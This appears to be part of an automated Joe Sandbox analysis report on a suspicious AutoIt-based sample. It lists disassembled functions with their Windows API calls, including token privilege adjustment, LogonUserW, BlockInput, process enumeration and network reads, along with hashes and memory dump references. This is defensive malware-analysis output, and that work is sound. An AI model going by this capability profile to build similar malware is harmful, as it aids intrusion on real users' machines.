                                            • Part of subcall function 00E680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E66AB1
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66ADA
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00E66B13
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66B20
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00E66B34
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: f2bc79b5057b31f9efcab2b62b3ce782478d9f30c939387f466f45a5eae28bbe
                                          • Instruction ID: 03cf56c60b74057246714d49d197fd454b8509b730363eb45fe9b02cdd063fd5
                                          • Opcode Fuzzy Hash: f2bc79b5057b31f9efcab2b62b3ce782478d9f30c939387f466f45a5eae28bbe
                                          • Instruction Fuzzy Hash: C441B575A40214AFEB10AF64DC96F7EB7A8DB44714F05C058FA1ABB2D2CA705D008BB1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: caa03ee852be04ebdc8e1156cb0c47c47c29ea9be97d9b154000d0b21ce2faa5
                                          • Instruction ID: 9af1dd8038cbf42ed2cb1f908183013db7947d9c5547d6acd69abcefc402dccf
                                          • Opcode Fuzzy Hash: caa03ee852be04ebdc8e1156cb0c47c47c29ea9be97d9b154000d0b21ce2faa5
                                          • Instruction Fuzzy Hash: B01104327009106FE7216FA6DC44B2FB798EF44721B41D429F90EF7240CBB09D428AA5
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E31D88,?), ref: 00E6C312
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E6C324
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 783ae2fbddce2d79ab8bafbdcc2e15edcb4accf2abfc676ca987c759431a569c
                                          • Instruction ID: 16f65f5264f062304f89255696f0ed3b5cfe9155296508ced25fb9f55b68a381
                                          • Opcode Fuzzy Hash: 783ae2fbddce2d79ab8bafbdcc2e15edcb4accf2abfc676ca987c759431a569c
                                          • Instruction Fuzzy Hash: 67E08C70280713CFCB208B26E804A5676D4EF08788F90E479E889F2210E774D880CA60
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E6F151
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E6F15F
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E6F21F
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E6F22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 1cbcd7bab60f42d38d59ab01e7b5e4192fea062e6d94e8f21a10ed635fa9be17
                                          • Instruction ID: 7b299b13ee869a373df88d228bb536e7e3374d7c8e0921fe25e85f5c7d53f56d
                                          • Opcode Fuzzy Hash: 1cbcd7bab60f42d38d59ab01e7b5e4192fea062e6d94e8f21a10ed635fa9be17
                                          • Instruction Fuzzy Hash: D85181715043059FD310EF20EC95E6BB7E8FF94750F11482DF59597262DB70A908CBA2
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E540D1
                                          • _memset.LIBCMT ref: 00E540F2
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E54144
                                          • CloseHandle.KERNEL32(00000000), ref: 00E5414D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: a9c9a0a3921fd4bc0dc89bd237931892325ce0c363759b01ee844970d2fd28c2
                                          • Instruction ID: 0f1321ef3310ba147ade7964bfb0dbf40902233c2837a0fa9d147f5f1480c316
                                          • Opcode Fuzzy Hash: a9c9a0a3921fd4bc0dc89bd237931892325ce0c363759b01ee844970d2fd28c2
                                          • Instruction Fuzzy Hash: 9E11EB759012287AD7309BA59C4DFEBBBBCEF44764F1045A6F908E71C0D6744EC48BA4
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E4EB19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: 33f3391f24332fe42f9ac0f48bd6520329e2d60f4265aaff253ca382252e6c11
                                          • Instruction ID: d040d9c25db49388c7805a223103f59db03c6156ea3c758e9c4729b03124ac28
                                          • Opcode Fuzzy Hash: 33f3391f24332fe42f9ac0f48bd6520329e2d60f4265aaff253ca382252e6c11
                                          • Instruction Fuzzy Hash: C0323675A006059FC728CF29D4819AAB7F1FF48310B15D56EE89AEB3A1D770E981CB40
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E626D5
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E6270C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: b5bd6691e02e05e5d4b3907d06cce969c99df595f1732c43f9170a05f3e46256
                                          • Instruction ID: ef61accea257c592e34924d1bd259fcc95e689c0c26b535ca3b1f28d0991877e
                                          • Opcode Fuzzy Hash: b5bd6691e02e05e5d4b3907d06cce969c99df595f1732c43f9170a05f3e46256
                                          • Instruction Fuzzy Hash: FD41D371940A09BFEB20DA54EC85EFF77ECEB407A8F10606EF705B6140EA71AD819764
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E5B5AE
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E5B608
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E5B655
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 1f205eb3c76977d62770d8a93fdc49382f98b4740f5241cd79fc48f4384f5f0f
                                          • Instruction ID: dbdc05dde5bff280ceb8c6b2c78273201a02b0a5ef9d7c48e1d10ebf3c8a84fb
                                          • Opcode Fuzzy Hash: 1f205eb3c76977d62770d8a93fdc49382f98b4740f5241cd79fc48f4384f5f0f
                                          • Instruction Fuzzy Hash: E2216035A00518EFCB00EF65D890AADFBB8FF49314F1580A9E905AB361DB31A959CF61
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                          • GetLastError.KERNEL32 ref: 00E48D47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: 68033cf353d65f2ede3effd2f8a7c693df27c057946e9816b5d25863ae502c19
                                          • Instruction ID: 376c34fe6fd2f5c2369a1592f1e92385613dc7650de45a26d66d2d0f8dd4a732
                                          • Opcode Fuzzy Hash: 68033cf353d65f2ede3effd2f8a7c693df27c057946e9816b5d25863ae502c19
                                          • Instruction Fuzzy Hash: 7B1194B1914205AFD728DF64ED85DABB7FCFF48710B10852EF455A7241DF70AC818A60
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E54C2C
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E54C43
                                          • FreeSid.ADVAPI32(?), ref: 00E54C53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 178cd6c6344bc3762aa1a33cb3b9d8888d2cc15bbf6665727e913bbec2b9973a
                                          • Instruction ID: d2ad6b7eb1781bedaed60ab77a26bce9e51ea2c790013b18e6f6a0364ebb4ab2
                                          • Opcode Fuzzy Hash: 178cd6c6344bc3762aa1a33cb3b9d8888d2cc15bbf6665727e913bbec2b9973a
                                          • Instruction Fuzzy Hash: B2F04975A1130CBFDF04DFF0DC89EAEBBBCEF08201F0044A9E905E2281E6706A489B50
                                          APIs
                                          • __time64.LIBCMT ref: 00E58B25
                                            • Part of subcall function 00E1543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E591F8,00000000,?,?,?,?,00E593A9,00000000,?), ref: 00E15443
                                            • Part of subcall function 00E1543A: __aulldiv.LIBCMT ref: 00E15463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID: 0u
                                          • API String ID: 2893107130-1339160046
                                          • Opcode ID: 8617a9cb53f5def5a9a9377cc95c35c3066d8d479062bda977d12aed1d72aa6e
                                          • Instruction ID: 7c6abd81ba8a9a045b50f68b7d86e995a555dbce46d7ca4dc43765c61e10d618
                                          • Opcode Fuzzy Hash: 8617a9cb53f5def5a9a9377cc95c35c3066d8d479062bda977d12aed1d72aa6e
                                          • Instruction Fuzzy Hash: 5F2102726355108FC329CF29D841A52B3E1EBA4311B289F2CD4E6EB2D0CA30B909CB90
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E5C966
                                          • FindClose.KERNEL32(00000000), ref: 00E5C996
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E6977D,?,00E7FB84,?), ref: 00E5A302
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E6977D,?,00E7FB84,?), ref: 00E5A314
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E48851), ref: 00E48728
                                          • CloseHandle.KERNEL32(?,?,00E48851), ref: 00E4873A
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E18F97,?,?,?,00000001), ref: 00E1A39A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E1A3A3
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 00E64218
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E54F18
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E488D1), ref: 00E48CB3
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E32242
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E1A36A
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00E7F910), ref: 00E738AF
                                          • IsWindowVisible.USER32(?), ref: 00E738D3
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: f02bdc7ec8f91cfda10e837e2118815cd5dabc9c443eee2f959ab8f30911b5e8
                                          • Instruction ID: f6c0c8b40f9867460688e5b929a343457e9c8686e058a5fd3797055e56263ba4
                                          • Opcode Fuzzy Hash: f02bdc7ec8f91cfda10e837e2118815cd5dabc9c443eee2f959ab8f30911b5e8
                                          • Instruction Fuzzy Hash: 7FD18530204305DBCB54EF20D451AAAB7E1EF95344F12A458F88A7B3A3DB71EE4ADB51
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00E7A89F
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E7A8D0
                                          • GetSysColor.USER32(0000000F), ref: 00E7A8DC
                                          • SetBkColor.GDI32(?,000000FF), ref: 00E7A8F6
                                          • SelectObject.GDI32(?,?), ref: 00E7A905
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E7A930
                                          • GetSysColor.USER32(00000010), ref: 00E7A938
                                          • CreateSolidBrush.GDI32(00000000), ref: 00E7A93F
                                          • FrameRect.USER32(?,?,00000000), ref: 00E7A94E
                                          • DeleteObject.GDI32(00000000), ref: 00E7A955
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E7A9A0
                                          • FillRect.USER32(?,?,?), ref: 00E7A9D2
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7A9FD
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(00000012), ref: 00E7AB99
                                            • Part of subcall function 00E7AB60: SetTextColor.GDI32(?,?), ref: 00E7AB9D
                                            • Part of subcall function 00E7AB60: GetSysColorBrush.USER32(0000000F), ref: 00E7ABB3
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(0000000F), ref: 00E7ABBE
                                            • Part of subcall function 00E7AB60: GetSysColor.USER32(00000011), ref: 00E7ABDB
                                            • Part of subcall function 00E7AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E7ABE9
                                            • Part of subcall function 00E7AB60: SelectObject.GDI32(?,00000000), ref: 00E7ABFA
                                            • Part of subcall function 00E7AB60: SetBkColor.GDI32(?,00000000), ref: 00E7AC03
                                            • Part of subcall function 00E7AB60: SelectObject.GDI32(?,?), ref: 00E7AC10
                                            • Part of subcall function 00E7AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E7AC2F
                                            • Part of subcall function 00E7AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E7AC46
                                            • Part of subcall function 00E7AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E7AC5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: 7ef0d434e8c9b030eb0df07348c235a75082d477f88d245b9230f6bdf623f954
                                          • Instruction ID: fc20ac6ea695ccefeb5194730c07e2b9d952d62e172221c4eeabdc3d3183770b
                                          • Opcode Fuzzy Hash: 7ef0d434e8c9b030eb0df07348c235a75082d477f88d245b9230f6bdf623f954
                                          • Instruction Fuzzy Hash: AFA19072008301AFD710DF65DC08E6F7BA9FF88325F145A29F96AA61E1D730D889CB52
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00DF2CA2
                                          • DeleteObject.GDI32(00000000), ref: 00DF2CE8
                                          • DeleteObject.GDI32(00000000), ref: 00DF2CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00DF2CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00DF2D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E2C68B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E2C6C4
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E2CAED
                                            • Part of subcall function 00DF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DF2036,?,00000000,?,?,?,?,00DF16CB,00000000,?), ref: 00DF1B9A
                                          • SendMessageW.USER32(?,00001053), ref: 00E2CB2A
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E2CB41
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E2CB57
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E2CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: 6e6a09918bdf0dca156dd8ad6674f36fef66afc6117c2a9618468c89b423ba8d
                                          • Instruction ID: 29cff18eb118a9d1a05473c169f978fcec16e4f86669cec5aa7736266ea0b441
                                          • Opcode Fuzzy Hash: 6e6a09918bdf0dca156dd8ad6674f36fef66afc6117c2a9618468c89b423ba8d
                                          • Instruction Fuzzy Hash: 47129C30600215AFDB24CF24D884BBDB7E5BF44304F659569E99AEB262C731EC81CFA1
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00E677F1
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E678B0
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E678EE
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E67900
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E67946
                                          • GetClientRect.USER32(00000000,?), ref: 00E67952
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E67996
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E679A5
                                          • GetStockObject.GDI32(00000011), ref: 00E679B5
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E679B9
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E679C9
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E679D2
                                          • DeleteDC.GDI32(00000000), ref: 00E679DB
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E67A07
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E67A1E
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E67A59
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E67A6D
